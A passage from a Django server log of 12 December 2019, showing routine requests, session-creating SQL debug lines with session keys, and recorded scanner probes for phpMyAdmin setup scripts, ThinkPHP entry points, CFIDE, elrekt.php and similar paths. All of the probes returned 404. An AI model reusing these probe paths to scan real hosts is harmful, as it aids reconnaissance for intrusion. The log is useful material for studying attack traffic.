args=(9,) [12/Dec/2019 07:46:00] "GET /api/v1/categories/ HTTP/1.0" 200 1769 [12/Dec/2019 07:50:28] "GET / HTTP/1.0" 302 0 [12/Dec/2019 07:58:13] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-12 07:58:13,712 utils 11259 139831317362432 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '23ilr242h22satzwi0mke0nf8djjih5v' LIMIT 1; args=('23ilr242h22satzwi0mke0nf8djjih5v',) DEBUG 2019-12-12 07:58:13,714 utils 11259 139831317362432 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('23ilr242h22satzwi0mke0nf8djjih5v', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-26T07:58:13.713445+00:00'::timestamptz); args=('23ilr242h22satzwi0mke0nf8djjih5v', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 26, 7, 58, 13, 713445, tzinfo=)) [12/Dec/2019 07:58:13] "GET /login/?next=/ HTTP/1.0" 200 1786 [12/Dec/2019 07:59:50] "GET / HTTP/1.0" 302 0 [12/Dec/2019 08:01:37] "GET / HTTP/1.0" 302 0 [12/Dec/2019 08:05:03] "GET / HTTP/1.0" 302 0 Not Found: /w00tw00t.at.blackhats.romanian.anti-sec:) [12/Dec/2019 08:05:56] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.0" 404 6716 Not Found: /phpMyAdmin/scripts/setup.php [12/Dec/2019 08:05:56] "GET /phpMyAdmin/scripts/setup.php HTTP/1.0" 404 6677 Not Found: /phpmyadmin/scripts/setup.php [12/Dec/2019 08:05:57] "GET /phpmyadmin/scripts/setup.php HTTP/1.0" 404 6677 Not Found: /pma/scripts/setup.php [12/Dec/2019 08:05:57] "GET /pma/scripts/setup.php HTTP/1.0" 404 6656 Not Found: /myadmin/scripts/setup.php [12/Dec/2019 08:05:57] "GET /myadmin/scripts/setup.php HTTP/1.0" 404 6668 Not Found: /MyAdmin/scripts/setup.php [12/Dec/2019 08:05:57] "GET /MyAdmin/scripts/setup.php HTTP/1.0" 404 6668 Not Found: /php/scripts/setup.php [12/Dec/2019 08:05:57] "GET /php/scripts/setup.php HTTP/1.0" 404 6656 Not Found: /myadm/scripts/setup.php [12/Dec/2019 08:05:58] "GET /myadm/scripts/setup.php HTTP/1.0" 404 6662 Not Found: /SQL/scripts/setup.php [12/Dec/2019 08:05:58] "GET /SQL/scripts/setup.php HTTP/1.0" 404 6656 Not Found: /phmyadm/scripts/setup.php [12/Dec/2019 08:05:58] "GET /phmyadm/scripts/setup.php HTTP/1.0" 404 6668 [12/Dec/2019 08:10:05] "GET / HTTP/1.0" 302 0 [12/Dec/2019 08:15:08] "GET / HTTP/1.0" 302 0 [12/Dec/2019 08:20:24] "GET / HTTP/1.0" 302 0 [12/Dec/2019 08:22:27] "GET / HTTP/1.0" 302 0 [12/Dec/2019 08:26:15] "GET / HTTP/1.0" 302 0 [12/Dec/2019 08:31:18] "GET / HTTP/1.0" 302 0 [12/Dec/2019 08:36:20] "GET / HTTP/1.0" 302 0 Not Found: /CFIDE/administrator/ [12/Dec/2019 08:40:24] "GET /CFIDE/administrator/ HTTP/1.0" 404 6653 [12/Dec/2019 08:41:23] "GET / HTTP/1.0" 302 0 [12/Dec/2019 08:41:42] "GET / HTTP/1.0" 302 0 [12/Dec/2019 08:46:25] "GET / HTTP/1.0" 302 0 [12/Dec/2019 08:51:28] "GET / HTTP/1.0" 302 0 [12/Dec/2019 08:56:31] "GET / HTTP/1.0" 302 0 [12/Dec/2019 09:05:03] "GET / HTTP/1.0" 302 0 Forbidden (CSRF cookie not set.): / [12/Dec/2019 09:09:08] "POST / HTTP/1.0" 403 2868 [12/Dec/2019 09:10:02] "GET /whm-server-status HTTP/1.0" 301 0 [12/Dec/2019 09:10:05] "GET / HTTP/1.0" 302 0 [12/Dec/2019 09:15:08] "GET / HTTP/1.0" 302 0 Not Found: /TP/public/index.php [12/Dec/2019 09:15:27] "GET /TP/public/index.php HTTP/1.0" 404 6650 Not Found: /TP/index.php [12/Dec/2019 09:15:28] "GET /TP/index.php HTTP/1.0" 404 6629 Not Found: /thinkphp/html/public/index.php [12/Dec/2019 09:15:28] "GET /thinkphp/html/public/index.php HTTP/1.0" 404 6683 Not Found: /html/public/index.php [12/Dec/2019 09:15:29] "GET /html/public/index.php HTTP/1.0" 404 6656 Not Found: /public/index.php [12/Dec/2019 09:15:30] "GET /public/index.php HTTP/1.0" 404 6641 Not Found: /TP/html/public/index.php [12/Dec/2019 09:15:30] "GET /TP/html/public/index.php HTTP/1.0" 404 6665 Not Found: /elrekt.php [12/Dec/2019 09:15:31] "GET /elrekt.php HTTP/1.0" 404 6623 Not Found: /index.php [12/Dec/2019 09:15:31] "GET /index.php HTTP/1.0" 404 6620 [12/Dec/2019 09:15:31] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-12 09:15:32,512 utils 11259 139831317362432 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'bb2j4kr5v5v7spn0n9wakunmmm8wul6u' LIMIT 1; args=('bb2j4kr5v5v7spn0n9wakunmmm8wul6u',) DEBUG 2019-12-12 09:15:32,515 utils 11259 139831317362432 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('bb2j4kr5v5v7spn0n9wakunmmm8wul6u', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-26T09:15:32.513309+00:00'::timestamptz); args=('bb2j4kr5v5v7spn0n9wakunmmm8wul6u', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 26, 9, 15, 32, 513309, tzinfo=)) [12/Dec/2019 09:15:32] "GET /login/?next=/ HTTP/1.0" 200 1786 [12/Dec/2019 09:20:10] "GET / HTTP/1.0" 302 0 [12/Dec/2019 09:28:43] "GET / HTTP/1.0" 302 0 [12/Dec/2019 09:33:45] "GET / HTTP/1.0" 302 0 [12/Dec/2019 09:38:28] "GET / HTTP/1.0" 302 0 [12/Dec/2019 09:38:48] "GET / HTTP/1.0" 302 0 [12/Dec/2019 09:43:50] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [12/Dec/2019 09:44:51] "GET /proxy.php HTTP/1.0" 404 6625 [12/Dec/2019 09:50:27] "GET / HTTP/1.0" 302 0 [12/Dec/2019 09:55:29] "GET / HTTP/1.0" 302 0 [12/Dec/2019 10:05:03] "GET / HTTP/1.0" 302 0 [12/Dec/2019 10:10:05] "GET / HTTP/1.0" 302 0 [12/Dec/2019 10:15:08] "GET / HTTP/1.0" 302 0 [12/Dec/2019 10:20:30] "GET / HTTP/1.0" 302 0 [12/Dec/2019 10:29:06] "GET / HTTP/1.0" 302 0 [12/Dec/2019 10:30:02] "GET /whm-server-status HTTP/1.0" 301 0 [12/Dec/2019 10:36:32] "GET / HTTP/1.0" 302 0 [12/Dec/2019 10:41:32] "GET / HTTP/1.0" 302 0 [12/Dec/2019 10:46:35] "GET / HTTP/1.0" 302 0 [12/Dec/2019 10:51:38] "GET / HTTP/1.0" 302 0 [12/Dec/2019 10:56:40] "GET / HTTP/1.0" 302 0 [12/Dec/2019 11:05:01] "GET /whm-server-status HTTP/1.0" 301 0 [12/Dec/2019 11:05:03] "GET / HTTP/1.0" 302 0 [12/Dec/2019 11:13:03] "GET / HTTP/1.0" 302 0 [12/Dec/2019 11:18:05] "GET / HTTP/1.0" 302 0 [12/Dec/2019 11:23:08] "GET / HTTP/1.0" 302 0 [12/Dec/2019 11:28:11] "GET / HTTP/1.0" 302 0 [12/Dec/2019 11:35:58] "GET / HTTP/1.0" 302 0 [12/Dec/2019 11:41:00] "GET / HTTP/1.0" 302 0 [12/Dec/2019 11:46:03] "GET / HTTP/1.0" 302 0 [12/Dec/2019 11:50:02] "GET /whm-server-status HTTP/1.0" 301 0 [12/Dec/2019 11:50:49] "GET / HTTP/1.0" 302 0 [12/Dec/2019 11:51:06] "GET / HTTP/1.0" 302 0 [12/Dec/2019 11:58:01] "GET / HTTP/1.0" 302 0 [12/Dec/2019 12:05:04] "GET / HTTP/1.0" 302 0 [12/Dec/2019 12:10:06] "GET / HTTP/1.0" 302 0 [12/Dec/2019 12:15:09] "GET / HTTP/1.0" 302 0 [12/Dec/2019 12:20:12] "GET / HTTP/1.0" 302 0 [12/Dec/2019 12:25:15] "GET / HTTP/1.0" 302 0 [12/Dec/2019 12:30:01] "GET /whm-server-status HTTP/1.0" 301 0 [12/Dec/2019 12:30:17] "GET / HTTP/1.0" 302 0 [12/Dec/2019 12:35:20] "GET / HTTP/1.0" 302 0 [12/Dec/2019 12:40:23] "GET / HTTP/1.0" 302 0 [12/Dec/2019 12:45:26] "GET / HTTP/1.0" 302 0 [12/Dec/2019 12:51:12] "GET / HTTP/1.0" 302 0 [12/Dec/2019 12:51:30] "GET / HTTP/1.0" 302 0 [12/Dec/2019 12:56:14] "GET / HTTP/1.0" 302 0 [12/Dec/2019 12:57:19] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-12 12:57:19,531 utils 11259 139831317362432 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'jfm4qvz31u0oo5qippp4wlzqqv8ypcar' LIMIT 1; args=('jfm4qvz31u0oo5qippp4wlzqqv8ypcar',) DEBUG 2019-12-12 12:57:19,534 utils 11259 139831317362432 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('jfm4qvz31u0oo5qippp4wlzqqv8ypcar', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-26T12:57:19.532108+00:00'::timestamptz); args=('jfm4qvz31u0oo5qippp4wlzqqv8ypcar', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 26, 12, 57, 19, 532108, tzinfo=)) [12/Dec/2019 12:57:19] "GET /login/?next=/ HTTP/1.0" 200 1786 [12/Dec/2019 12:57:55] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-12 12:57:56,176 utils 11259 139831317362432 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '6umkwn62zwj6duc8cr5zwy2njso78dcc' LIMIT 1; args=('6umkwn62zwj6duc8cr5zwy2njso78dcc',) DEBUG 2019-12-12 12:57:56,179 utils 11259 139831317362432 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('6umkwn62zwj6duc8cr5zwy2njso78dcc', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-26T12:57:56.177536+00:00'::timestamptz); args=('6umkwn62zwj6duc8cr5zwy2njso78dcc', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 26, 12, 57, 56, 177536, tzinfo=)) [12/Dec/2019 12:57:56] "GET /login/?next=/ HTTP/1.0" 200 1786 [12/Dec/2019 12:58:28] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-12 12:58:28,954 utils 11259 139831317362432 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'sdl8ytyn2rp3w9d6rfqgfr0t31hsw8ow' LIMIT 1; args=('sdl8ytyn2rp3w9d6rfqgfr0t31hsw8ow',) DEBUG 2019-12-12 12:58:28,956 utils 11259 139831317362432 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('sdl8ytyn2rp3w9d6rfqgfr0t31hsw8ow', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-26T12:58:28.955355+00:00'::timestamptz); args=('sdl8ytyn2rp3w9d6rfqgfr0t31hsw8ow', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 26, 12, 58, 28, 955355, tzinfo=)) [12/Dec/2019 12:58:28] "GET /login/?next=/ HTTP/1.0" 200 1786 [12/Dec/2019 12:58:29] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-12 12:58:29,298 utils 11259 139831317362432 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'yms1yibgabvsbynipz4f30tu50hvfaba' LIMIT 1; args=('yms1yibgabvsbynipz4f30tu50hvfaba',) DEBUG 2019-12-12 12:58:29,301 utils 11259 139831317362432 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('yms1yibgabvsbynipz4f30tu50hvfaba', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-26T12:58:29.299422+00:00'::timestamptz); args=('yms1yibgabvsbynipz4f30tu50hvfaba', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 26, 12, 58, 29, 299422, tzinfo=)) [12/Dec/2019 12:58:29] "GET /login/?next=/ HTTP/1.0" 200 1786 [12/Dec/2019 12:58:39] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-12 12:58:39,842 utils 11259 139831317362432 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'phwu66c9sxrgyx1kzg0unzy6f6yn2jce' LIMIT 1; args=('phwu66c9sxrgyx1kzg0unzy6f6yn2jce',) DEBUG 2019-12-12 12:58:39,844 utils 11259 139831317362432 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('phwu66c9sxrgyx1kzg0unzy6f6yn2jce', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-26T12:58:39.842856+00:00'::timestamptz); args=('phwu66c9sxrgyx1kzg0unzy6f6yn2jce', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 26, 12, 58, 39, 842856, tzinfo=)) [12/Dec/2019 12:58:39] "GET /login/?next=/ HTTP/1.0" 200 1786 [12/Dec/2019 13:05:03] "GET / HTTP/1.0" 302 0 [12/Dec/2019 13:05:12] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-12 13:05:12,921 utils 11259 139831317362432 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'matz61uutkse9wdxhjsm289tdgo3teic' LIMIT 1; args=('matz61uutkse9wdxhjsm289tdgo3teic',) DEBUG 2019-12-12 13:05:12,923 utils 11259 139831317362432 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('matz61uutkse9wdxhjsm289tdgo3teic', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-26T13:05:12.921858+00:00'::timestamptz); args=('matz61uutkse9wdxhjsm289tdgo3teic', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 26, 13, 5, 12, 921858, tzinfo=)) [12/Dec/2019 13:05:12] "GET /login/?next=/ HTTP/1.0" 200 1786 [12/Dec/2019 13:14:54] "GET / HTTP/1.0" 302 0 [12/Dec/2019 13:19:56] "GET / HTTP/1.0" 302 0 [12/Dec/2019 13:24:59] "GET / HTTP/1.0" 302 0 [12/Dec/2019 13:34:23] "GET / HTTP/1.0" 302 0 [12/Dec/2019 13:39:26] "GET / HTTP/1.0" 302 0 [12/Dec/2019 13:44:29] "GET / HTTP/1.0" 302 0 [12/Dec/2019 13:49:32] "GET / HTTP/1.0" 302 0 [12/Dec/2019 13:49:47] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-12 13:49:47,881 utils 11259 139831317362432 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'h47kp153bcinm1ok8vtl32wczihvtsei' LIMIT 1; args=('h47kp153bcinm1ok8vtl32wczihvtsei',) DEBUG 2019-12-12 13:49:47,883 utils 11259 139831317362432 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('h47kp153bcinm1ok8vtl32wczihvtsei', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-26T13:49:47.881895+00:00'::timestamptz); args=('h47kp153bcinm1ok8vtl32wczihvtsei', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 26, 13, 49, 47, 881895, tzinfo=)) [12/Dec/2019 13:49:47] "GET /login/?next=/ HTTP/1.0" 200 1786 [12/Dec/2019 13:54:35] "GET / HTTP/1.0" 302 0 [12/Dec/2019 14:00:01] "GET / HTTP/1.0" 302 0 [12/Dec/2019 14:05:03] "GET / HTTP/1.0" 302 0 [12/Dec/2019 14:11:02] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-12 14:11:02,241 utils 11259 139831317362432 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'rk15rj2a4go205pcp176s23jv1n2n51g' LIMIT 1; args=('rk15rj2a4go205pcp176s23jv1n2n51g',) DEBUG 2019-12-12 14:11:02,244 utils 11259 139831317362432 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('rk15rj2a4go205pcp176s23jv1n2n51g', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-26T14:11:02.242458+00:00'::timestamptz); args=('rk15rj2a4go205pcp176s23jv1n2n51g', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 26, 14, 11, 2, 242458, tzinfo=)) [12/Dec/2019 14:11:02] "GET /login/?next=/ HTTP/1.0" 200 1786 [12/Dec/2019 14:11:19] "GET / HTTP/1.0" 302 0 [12/Dec/2019 14:16:33] "GET / HTTP/1.0" 302 0 [12/Dec/2019 14:20:01] "GET /whm-server-status HTTP/1.0" 301 0 [12/Dec/2019 14:21:35] "GET / HTTP/1.0" 302 0 [12/Dec/2019 14:26:38] "GET / HTTP/1.0" 302 0 [12/Dec/2019 14:31:41] "GET / HTTP/1.0" 302 0 [12/Dec/2019 14:36:44] "GET / HTTP/1.0" 302 0 [12/Dec/2019 14:41:47] "GET / HTTP/1.0" 302 0 [12/Dec/2019 14:48:47] "GET / HTTP/1.0" 302 0 [12/Dec/2019 14:49:09] "GET / HTTP/1.0" 302 0 [12/Dec/2019 14:54:14] "GET / HTTP/1.0" 302 0 [12/Dec/2019 14:59:17] "GET / HTTP/1.0" 302 0 [12/Dec/2019 15:04:49] "GET / HTTP/1.0" 302 0 [12/Dec/2019 15:08:39] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-12 15:08:39,741 utils 11259 139831317362432 (0.005) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '10pqt1eypy0ljqs1oss4l61f8ky38oyr' LIMIT 1; args=('10pqt1eypy0ljqs1oss4l61f8ky38oyr',) DEBUG 2019-12-12 15:08:39,744 utils 11259 139831317362432 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('10pqt1eypy0ljqs1oss4l61f8ky38oyr', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-26T15:08:39.742306+00:00'::timestamptz); args=('10pqt1eypy0ljqs1oss4l61f8ky38oyr', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 26, 15, 8, 39, 742306, tzinfo=)) [12/Dec/2019 15:08:39] "GET /login/?next=/ HTTP/1.0" 200 1786 [12/Dec/2019 15:10:05] "GET / HTTP/1.0" 302 0 [12/Dec/2019 15:15:08] "GET / HTTP/1.0" 302 0 [12/Dec/2019 15:20:11] "GET / HTTP/1.0" 302 0 [12/Dec/2019 15:25:14] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [12/Dec/2019 15:26:26] "GET /proxy.php HTTP/1.0" 404 6629 [12/Dec/2019 15:30:17] "GET / HTTP/1.0" 302 0 [12/Dec/2019 15:40:12] "GET / HTTP/1.0" 302 0 [12/Dec/2019 15:45:15] "GET / HTTP/1.0" 302 0 [12/Dec/2019 15:50:01] "GET /whm-server-status HTTP/1.0" 301 0 [12/Dec/2019 15:50:18] "GET / HTTP/1.0" 302 0 [12/Dec/2019 15:50:31] "GET / HTTP/1.0" 302 0 [12/Dec/2019 15:55:21] "GET / HTTP/1.0" 302 0 [12/Dec/2019 16:00:01] "GET /whm-server-status HTTP/1.0" 301 0 [12/Dec/2019 16:05:03] "GET / HTTP/1.0" 302 0 [12/Dec/2019 16:10:50] "GET / HTTP/1.0" 302 0 [12/Dec/2019 16:12:38] "GET / HTTP/1.0" 302 0 [12/Dec/2019 16:17:15] "GET / HTTP/1.0" 302 0 [12/Dec/2019 16:22:18] "GET / HTTP/1.0" 302 0 [12/Dec/2019 16:22:43] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-12 16:22:48,065 utils 11259 139831317362432 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'e0ed24o26oq462hczyg7nop0ww4lhab5' LIMIT 1; args=('e0ed24o26oq462hczyg7nop0ww4lhab5',) DEBUG 2019-12-12 16:22:48,066 utils 11259 139831317362432 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('e0ed24o26oq462hczyg7nop0ww4lhab5', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-26T16:22:48.065568+00:00'::timestamptz); args=('e0ed24o26oq462hczyg7nop0ww4lhab5', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 26, 16, 22, 48, 65568, tzinfo=)) [12/Dec/2019 16:22:48] "GET /login/?next=/ HTTP/1.0" 200 1786 Not Found: /robots.txt [12/Dec/2019 16:22:54] "GET /robots.txt HTTP/1.0" 404 6623 [12/Dec/2019 16:25:01] "GET /whm-server-status HTTP/1.0" 301 0 [12/Dec/2019 16:26:17] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [12/Dec/2019 16:26:56] "GET /robots.txt HTTP/1.0" 404 6624 Not Found: /User/User_Favorite.asp [12/Dec/2019 16:26:58] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=109 HTTP/1.0" 404 6705 Not Found: /newslist.asp [12/Dec/2019 16:27:00] "GET /newslist.asp?type=4&id=1296 HTTP/1.0" 404 6649 [12/Dec/2019 16:32:00] "GET / HTTP/1.0" 302 0 [12/Dec/2019 16:37:03] "GET / HTTP/1.0" 302 0 [12/Dec/2019 16:42:05] "GET / HTTP/1.0" 302 0 [12/Dec/2019 16:48:45] "GET / HTTP/1.0" 302 0 [12/Dec/2019 16:51:38] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-12 16:51:38,217 utils 11259 139831317362432 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'mwr36v9s11uxobqehjorxlxqfsd8qm7b' LIMIT 1; args=('mwr36v9s11uxobqehjorxlxqfsd8qm7b',) DEBUG 2019-12-12 16:51:38,218 utils 11259 139831317362432 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('mwr36v9s11uxobqehjorxlxqfsd8qm7b', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-26T16:51:38.217514+00:00'::timestamptz); args=('mwr36v9s11uxobqehjorxlxqfsd8qm7b', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 26, 16, 51, 38, 217514, tzinfo=)) [12/Dec/2019 16:51:38] "GET /login/?next=/ HTTP/1.0" 200 1786 [12/Dec/2019 16:57:42] "GET / HTTP/1.0" 302 0 [12/Dec/2019 17:05:03] "GET / HTTP/1.0" 302 0 [12/Dec/2019 17:10:06] "GET / HTTP/1.0" 302 0 [12/Dec/2019 17:15:09] "GET / HTTP/1.0" 302 0 [12/Dec/2019 17:20:43] "GET / HTTP/1.0" 302 0 [12/Dec/2019 17:26:05] "GET / HTTP/1.0" 302 0 [12/Dec/2019 17:31:08] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-12 17:32:09,072 utils 11259 139831317362432 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'ubqe0f4yqmn3qmri3mh0jbd39zndr8aq' LIMIT 1; args=('ubqe0f4yqmn3qmri3mh0jbd39zndr8aq',) DEBUG 2019-12-12 17:32:09,074 utils 11259 139831317362432 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('ubqe0f4yqmn3qmri3mh0jbd39zndr8aq', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-26T17:32:09.072681+00:00'::timestamptz); args=('ubqe0f4yqmn3qmri3mh0jbd39zndr8aq', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 26, 17, 32, 9, 72681, tzinfo=)) [12/Dec/2019 17:32:09] "GET /login/?next=/ HTTP/1.0" 200 1786 [12/Dec/2019 17:40:47] "GET / HTTP/1.0" 302 0 [12/Dec/2019 17:46:56] "GET / HTTP/1.0" 302 0 [12/Dec/2019 17:56:12] "GET / HTTP/1.0" 302 0 [12/Dec/2019 17:56:28] "GET / HTTP/1.0" 302 0 Not Found: /TP/public/index.php [12/Dec/2019 18:04:50] "GET /TP/public/index.php HTTP/1.0" 404 6650 Not Found: /TP/index.php [12/Dec/2019 18:04:50] "GET /TP/index.php HTTP/1.0" 404 6629 Not Found: /thinkphp/html/public/index.php [12/Dec/2019 18:04:51] "GET /thinkphp/html/public/index.php HTTP/1.0" 404 6683 Not Found: /html/public/index.php [12/Dec/2019 18:04:51] "GET /html/public/index.php HTTP/1.0" 404 6656 Not Found: /public/index.php [12/Dec/2019 18:04:52] "GET /public/index.php HTTP/1.0" 404 6641 Not Found: /TP/html/public/index.php [12/Dec/2019 18:04:53] "GET /TP/html/public/index.php HTTP/1.0" 404 6665 Not Found: /elrekt.php [12/Dec/2019 18:04:53] "GET /elrekt.php HTTP/1.0" 404 6623 Not Found: /index.php [12/Dec/2019 18:04:54] "GET /index.php HTTP/1.0" 404 6620 [12/Dec/2019 18:04:54] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-12 18:04:55,100 utils 11259 139831317362432 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'cfsyaw9dpf3u5df7sw9xeo744sruyyz8' LIMIT 1; args=('cfsyaw9dpf3u5df7sw9xeo744sruyyz8',) DEBUG 2019-12-12 18:04:55,103 utils 11259 139831317362432 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('cfsyaw9dpf3u5df7sw9xeo744sruyyz8', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-26T18:04:55.101277+00:00'::timestamptz); args=('cfsyaw9dpf3u5df7sw9xeo744sruyyz8', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 26, 18, 4, 55, 101277, tzinfo=)) [12/Dec/2019 18:04:55] "GET /login/?next=/ HTTP/1.0" 200 1786 [12/Dec/2019 18:05:02] "GET / HTTP/1.0" 302 0 [12/Dec/2019 18:10:05] "GET / HTTP/1.0" 302 0 [12/Dec/2019 18:15:01] "GET /whm-server-status HTTP/1.0" 301 0 [12/Dec/2019 18:15:08] "GET / HTTP/1.0" 302 0 [12/Dec/2019 18:22:10] "GET / HTTP/1.0" 302 0 [12/Dec/2019 18:27:13] "GET / HTTP/1.0" 302 0 [12/Dec/2019 18:32:16] 